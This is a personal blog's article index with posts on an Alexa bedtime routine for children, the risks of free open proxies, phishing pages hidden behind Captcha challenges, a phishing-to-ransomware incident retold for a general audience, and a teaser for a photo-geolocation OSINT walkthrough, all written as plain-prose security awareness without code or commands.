Craig Hays

You are here: Home / All Articles

All Articles

“Alexa, Put The Kids to Bed and Make Them Sleep”

By Leave a Comment

Reading Time: 3 minutes

How my Alexa voice assistant’s bedtime routine settles my kids down for an easy bedtime, every single night.

Alexa bedtime routine
Photo by Annie Spratt on Unsplash

As parents of young children, we dream of quick and pain-free bedtimes with no tantrums, tears, or bargaining. Our kids, on the other hand, often see bedtime as playtime in a different room with the lights turned down.

To combat this, my wife and I have a strict bedtime routine to ensure our little ones fall asleep happily with the least resistance possible. Our beloved Alexa is a critical member of our team. This is how it works.

Our Amazing Alexa Kids Bedtime Routine

After dinner, it’s time for a bath with some playtime followed by a wash and wind-down time. Then it’s pyjamas on, hair and teeth brushed, and into bed with a bottle of milk and a story. Once the story is done, Alexa takes over.

“Alexa, night night”

“Night night, sweetheart”, Alexa replies. The delicate sound of Baby Mine from Dumbo played soothingly on a xylophone fills the room with an audible warmth.

Within a few minutes, my little one is asleep.

Like Pavlov’s dogs, we’ve conditioned my eldest to associate going to sleep with our chosen Spotify playlist. My youngest daughter is only 7 weeks old and we’ve already started planting that same mental trigger in her head.

We could do all of this without Alexa, but having a voice assistant that kicks off the routine on a spoken command makes consistency so easy to maintain it would be more difficult to not be consistent.

Setting Up The Perfect Kids Bedtime Alexa Routine

The perfect kids bedtime Alexa routine – simple yet effective
  • From the Alexa app, go to More > Routines, then create a new routine by clicking on the + icon in the top right corner.
  • Give your new routine a suitable name. I simply call mine ‘Night night’.
  • Pick your welcome phrase. When I say “Alexa, Night Night”
  • Add your actions. Mine are:
    • Alexa says, “Night night, sweetheart”
    • Play my kids’ bedtime playlist on Spotify
    • From the device that I’ve spoken to.

The Spotify playlist is a custom playlist I’ve created that is simply the album “Disney Lullabies” from the artist “Rockabye Lullaby”, released in 2011. I created a playlist as, for some reason, Alexa struggles to find the album when referenced directly. Instead, the uniquely named playlist ensures that it plays the correct album every time. The last thing I want when putting my kids to sleep is unexpected death metal.

Consistency at Bedtime is Critical

Having a consistent bedtime routine is the most important element of this. The Alexa technology is a nice-to-have, hands-free, luxury that means I don’t need to get up and disturb my soon-to-be-sleeping child in order to start the music. But it isn’t Alexa that actually makes them sleep.

Doing the same thing every night establishes an automatic behavioural response from the kids which helps us to achieve what we want. Familiarity over novelty.

Recently, while my eldest was acting up at bedtime, I dropped the “Alexa, night night” bomb and as soon as the music came on she climbed straight into bed and lay down without any further encouragement. I was stunned. While I hoped it would calm her down, I didn’t think the effect would have been so instantaneous and overwhelming. I would never have thought going from tantrum to tucked up tight so quickly was possible.

Alexa routines are a great way to automate consistency in your life. Don’t get me wrong, bedtimes haven’t always been this easy, but the effort we’ve put into establishing this routine has been well worth it. Now if only Alexa could do laundry…

Why You Should Never Trust a Free Proxy Server

By Leave a Comment

Reading Time: 6 minutes

Free and open proxy servers promise anonymous internet access, but at what cost?

Never trust an open proxy server
Photo by Mikael Seegen on Unsplash

In a world of ever-decreasing online privacy, it’s easy to get sucked into the ‘use an anonymous proxy to stay safe’ narrative. I’ve got nothing against using reputable proxy services or VPNs (virtual private networks), but the ‘free’ proxy services you find on the web can be anything but.

What’s the Difference Between a Proxy and a VPN?

People use proxies and VPNs (Virtual Private Networks) to hide their real IP address and masquerade as other devices on the internet. There are many reasons to do this including bypassing content geo-restrictions, bypassing government filters (Great Firewall of China), bypassing censorship enforced by your Internet Service Provider (ISP), and hiding your real identity from others online.

Your standard internet connection gives you direct access to everything on the internet. Web pages, Skype and Zoom calls, online gaming, it all goes straight from your device to the final destination. To everyone else on the internet, you are you. Your access is limited to what your ISP and government will let you see. All of your traffic is from the country in which you reside.

A virtual private network (VPN) wraps all of your online activity in an encrypted envelope and sends it to another server, your VPN server. This server then unwraps it and sends it to where you wanted it to go. To everyone else on the internet, you are the VPN server, not the real you. Depending on the location of your VPN server, you will be able to bypass some or all of the restrictions described earlier.

A web proxy receives requests for web pages from your device and fetches those pages on your behalf. All other communication remains direct from your device to the destination servers and back. To all web servers on the internet, you are the proxy server. To everything else, you are you. This has a similar effect to a VPN but only for web browsing.

VPN vs web proxy
Standard access vs. VPN access vs. web proxy access

In summary, a VPN moves your visible internet connection from your device to a remote server. A proxy server fetches web content on your behalf but you still appear as your device to anything non-web related.

Free vs. Paid Proxies and VPNs

When you pay for a VPN or web proxy you can expect a minimum level of service in exchange for your money. That minimum level covers things like:

  • High-availability of access
  • Good transfer speeds
  • Untampered data transfers
  • No logs stored anywhere of what you do (optional for anonymous VPNs/Proxies)

They make money because you pay them. Therefore, they are incentivised to give a good service to keep you coming back for more.

Free VPNs and proxies, on the other hand, don’t make money directly from you. Sure, some of these services offer a ‘free tier’ where they give you a few GB of transfer for free each month. They make a profit when you upgrade to the paid version. These are freemium services with limited trials that entice you to upgrade and pay. When I talk about free proxies and VPNs I don’t mean limited-use free trials.

A ‘free’ service is one that never asks you for money, ever. When you look at these services, you must ask yourself, “why do these exist?” People generally don’t run free VPNs and open proxies for the good of humanity. When you consume these services they’re likely to be using you in some way.

As the saying goes, “if you’re not the customer, you’re the product.”

Finding ‘Free’ Open Web Proxies

A quick search on google for ‘open web proxies’ or ‘anonymous web proxies’ returns thousands of results with links to websites listing proxy servers that anyone can use without paying a penny.

Open proxy server list from a Google search

The above is a screenshot of one of these lists. Each list contains lots of server IP addresses and ports. Anyone can configure their web browser to use any of these free, open proxies to proxy all of their web traffic to the internet. None of these servers come with any guarantees and there’s no indication of who is operating them. Many of them are in countries with very lax cybersecurity laws.

Proxy directories maintain their lists by brute-force scanning the internet for open proxies and accepting user submissions by random members of the public. There is no quality control, no peer review capability, and no oversight in any way. This means people like me can set up our own malicious ‘anonymous’ proxy servers and, within a few minutes, have strangers on the internet sending us all sorts of things.

So what can we do to the users of open proxies?

Data Loss Through an Open Proxy

If you use a proxy server for browsing the web, anything you send or receive that isn’t encrypted, (anything in plain text), can be read by the owner of the proxy service. When your communications are encrypted, the attacker can spoof messages from the target server and force you to downgrade your encryption to a crackable level. When this happens, the server can crack the encryption and read your messages without you ever knowing about it. You or your company IT team can configure your devices to prevent this, but how many actually do it?

Failing that, any content you download that isn’t encrypted can be altered to change all links to secure HTTPS sites to the insecure, plain-text HTTP version. You may not even notice that your browser is no longer asking for encrypted versions of sites as it usually would.

This probably isn’t something you need to worry about with a legitimate service, but that ransom, open proxy server you found on the internet?…

Data Tempering and Content Injection by the Proxy

When data is unencrypted (plain-text), malicious proxies can do more than read what you’re talking about. They can actively contribute to the conversation.

Imagine what would happen if you received a quote for a service and the proxy server you were browsing through changed the bank details of the intended recipient to their own? What if they blocked your content altogether? What if they corrupted it so that it couldn’t be trusted? All of these things are possible when you’re using an untrusted machine-in-the-middle of your comms.

Something else which is possible is ad-fraud. The proxy owner changes any advertising content requests sent by your browser for their own ads. The subtlety of this may vary and you may not even notice it happening. When it does, the legitimate owner of a site loses the revenue you would have generated for them. For many site owners, advertising revenue is what keeps them online.

One of the scariest things I’ve seen with open proxies is the injection of malicious javascript code into the existing javascript of every web page downloaded. Nothing else was changed, it just loaded a small piece of code into your browser every time you opened a new page. This code can access your cookies, make requests on your behalf, and even join a botnet directly from your browser.

Hanging Around With a Bad Crowd

Something not often discussed with open proxies is the behaviour of other users. While you might not be committing any crimes via an open proxy, that doesn’t stop others from doing it beside you. If someone commits a crime and the ‘anonymous’ proxy server is confiscated and reveals its not-so-deleted logs, your IP address and traffic history is going to be right there with the criminals. For pretty much every scenario I can think of, I wouldn’t want my name and address linked with that activity.

Summary

Open proxies may look like a good deal, but most of the time, they’re not. If you’re not paying for them you’re most likely to be the product being sold. Stick with paid and legitimate services to stay safe. The prices are relatively low and the ‘free’ versions could cost you more in other ways.

How Phishing Websites Use Captcha to Fool Browsers and People

By Leave a Comment

Reading Time: 5 minutes

Evading detection and building trust with Captcha challenges and Smishing attacks.

EE Smishing, phishing and a captcha form
The latest SMS Phishing message I’ve received from not-my-real phone company

This week I received another SMS Phishing attack which was almost identical to the previous Smishing attack covered. There were two things that struck me as particularly interesting this time:

  1. The attack used the s.id Indonesian link shortening service
  2. The attack used a Captcha page to limit access to the phishing page to real people only

Thinking about the first point, it’s clear that s.id, the “World’s shortest URL shortener”, has been chosen to minimise the size of the links in the phishing text message. I would guess that they’re also not particularly quick about removing malicious links (but I could be wrong).

The second point, the use of a Captcha form after clicking on the link in the text message, is interesting to me in three ways.

Phishing site asking you to ‘please prove that you are not a robot’

1. Using Captcha to Block Malware Detection

Without a doubt, preventing the automatic detection of the phishing page on the website is the primary reason for hiding it behind a Captcha challenge.

Captcha is almost short for ‘Completely Automated Public Turing test to tell Computers and Humans Apart’. This is a convoluted way of saying ‘if you can read this sign you’re a human and I’ll let you in.’ The premise is that computer image recognition is still not good enough to accurately decipher the words in the image and therefore only people can pass the test.

What that means for automated malware scanners is that they can’t see the phishing pages that innocent people are being sent links to.

Automated Phishing Site Detection

There are a lot of people trying really hard to detect and block phishing pages in as many places as possible before they cause actual people actual harm. Tools such as Microsoft ATP and Google Safe Browsing to name just two automatically fetch and scan web pages and score them against a constantly evolving set of rules in order to determine if they’re real or fake.

When a malicious website is detected it is added to the naughty-list and any time someone tries to access that site it is either blocked or they are shown a warning message like this:

Google Chrome deceptive site ahead warning message
A suspicious website warning from the Google Chrome browser

Phishing sites usually run on commodity phishing kits – pre-packaged software bundles designed specifically for stealing and saving sensitive information without getting caught. As they’re so widely and consistently used, they’re really easy to detect. When a website has replica EE branding all over it and it isn’t the real EE domain, it’s obviously a fake site.

Fake EE phishing site hidden behind a Captcha form

By hiding the phishing kit behind a Captcha page it prevents automated scanners from analysing it. This means they can’t be automatically added to the naughty-list and users could be Captcha-ing themselves into an unsafe site without realising it.

As soon as a user sees a warning message like the one ‘Deceptive Site’ one above, it’s usually game over for that particular phishing attack. Staying under the radar by evading detection means that once the user passes the Captcha challenge, there’s a high probability of a successful phish attack being completed.

2. Captcha as an Accidental Credibility Indicator

As a weird byproduct of blocking automated scanners, adding a Captcha page gives a phishing site a weird sense of credibility in the eyes of some users. Most of the time, when we see Captcha forms, it’s to protect something we care about from harmful robots. For example, Captcha is used to prevent bots from brute-forcing our passwords and gaining access to our online accounts.

When we see Captcha forms we have a habitual response to trust what they’re doing. It’s not particularly strong, but it’s there. For many, the context within which it appears will be enough to override any sense of ‘this is fine’. Some of the less cyber-aware people on the internet won’t see what we see. This is the target market for a phishing campaign like this.

3. It Isn’t Even Mobile-Ready!

This is the bit I find the most infuriating. The attack could have been so much better but it let itself down!

The phishing or smishing attack was delivered by text message directly to my smartphone. It’s a mobile-only attack vector and yet the Captcha part of phishing kit isn’t even mobile ready!

While I cropped the image to make it readable in the earlier screenshot, I left the alignment and spacing as is. In fact, on my smartphone it actually looked like this:

I’ve still cropped the bottom of the image as it was ridiculously long and with a very small font…

Look how small that is!

It baffles me how attackers can be so on-the-money about one thing such as evading automatic detection and yet be clueless about how the attack is presented to the end-user. Had this been mobile-ready with a responsive layout that matched the shape and size of the screen, this entry point would have been so much more effective.

We can see that attackers and their tactics are evolving and improving over time. Next time the Captcha form might be better integrated. Next time they might even attempt to fake ‘Multi-Factor Authentication’ me since they already had my phone number to begin with. All I know is that they’re willing to experiment and get creative about future attacks in order to increase the likelihood of a payout as much as possible.

Also, Sorry DataHubClub!

(It looks like your CMS was compromised and used for this attack. I hope you get that sorted quickly. From Googling the name and domain, I suspect it’s just a dead DNS entry that’s pointing to a cloud server that someone has spun back up and taken advantage of. You’ve probably not been hacked at all… but who knows…)

Phishing Email to Company Devastating Ransomware in 5 Hours

By 2 Comments

Reading Time: 6 minutes

How hackers manually escalated from a malicious email to a devastating, company-wide ransomware takeover in under 5 hours.

It started with a phish ransomware in 5 hours
Photo by Pixabay from Pexels

(This article aims to contextualise an excellent incident report by Thedfirreport.com. I’ve used my own experience to fill in the gaps to demonstrate how these attacks affect real people in real companies.)

The Attack Started Like Many Others

A phishing email landed in the victims inbox at around 5 pm UTC and was promptly opened and read. There was nothing particularly suspicious about it. It was a well-written email with a reasonable call to action. There were no urgent demands. It wasn’t claiming to be from the company CEO. It looked identical to many of other emails received that same day.

The company email servers scanned it and allowed it straight through to the victim’s inbox. It was sent through a legitimate and well-known email delivery service with a good reputation. There were no attachments to be scanned for malware. All it contained was a politely written request and a link to a web page.

The web page didn’t ask them to log in. It wasn’t trying to steal their password by masquerading as a trusted login page. All the victim saw was a message saying: ‘Oops! The document preview isn’t available. Click here to download’, or words to that effect. This is the sort of error message that we’ve all seen many times over the years. Most of us wouldn’t think twice about clicking that link, myself included.

Malware In Disguise

The browser downloaded a file named something like PreviewReport.DOC.exe. A warning message came up at the bottom of their browser asking if the user wanted to keep or discard the file as it could be harmful.

Regrettably, our unfortunate user downloads all sorts of documents all day every day and many of them give the exact same warning. They’ve learned that this warning message is just a regular part of online life. One more thing they must click on in order to get work done. Out of habit, they clicked on ‘keep’, then opened the file.

The executable was signed with a trusted certificate from a well-known vendor. It was malicious, and yet it was signed. The thing is, anyone can buy legitimate and trusted software signing certificates on the internet these days if you know where to look. The user’s PC had AppLocker configured to block unsigned executables but it made no difference. The trusted, signed malware executed without a problem.

Their local antivirus software had the latest virus signatures downloaded and available. As the malware was unique to this victim, the signature didn’t match anything on record. Nothing was blocked.

As far as the user was concerned, the file did nothing. Perhaps it was corrupted. Nevermind…

Sadly, it wasn’t corrupted. It sent a message out to a command and control server on the internet to say, ‘Hello, I’m here, And I’m waiting’, then opened a backdoor into the heart of the company network. It checked-in using standard, encrypted, HTTPS traffic, and notified the ransomware gang that it was active and waiting for instructions. From the outside, it looked exactly the same as the device’s owner viewing any other secure web page on the internet.

[Read more…] about Phishing Email to Company Devastating Ransomware in 5 Hours

How An Investigator Can Find Your Location From One Photograph

By Leave a Comment

Reading Time: 7 minutes

Every image you post online leaks information about you. This is how anyone can find your location using Open Source Intelligence (OSINT).

How An Investigator Finds Your Location From One Photograph
Let’s find the exact location of this photograph together.

Open Source Intelligence In Action – Geolocating a Photograph

Open Source Intelligence (OSINT) is the practice of using public or ‘open source’ information available on the internet to gather intelligence and gain insights on given targets. By combining data sources available online you can find answers to a variety of questions that most people wouldn’t think is possible.

For example, the sunset photo above is one I took a couple of years ago while travelling for work. It’s not an instantly recognisable location. It’s probably not even that recognisable to the people who live nearby. But a motivated investigator can find the exact spot where I was stood when I captured it using this one photograph and information freely available online.

For the rest of this walk-through, I’ll pretend that this is the first time I’ve seen this photograph. I’ll show you how I approach the challenge of finding where any camera stood on Earth when taking any photograph. While methods and results may vary, this is an example of what the OSINT process looks like for this type of scenario.

[Read more…] about How An Investigator Can Find Your Location From One Photograph

Craig Hays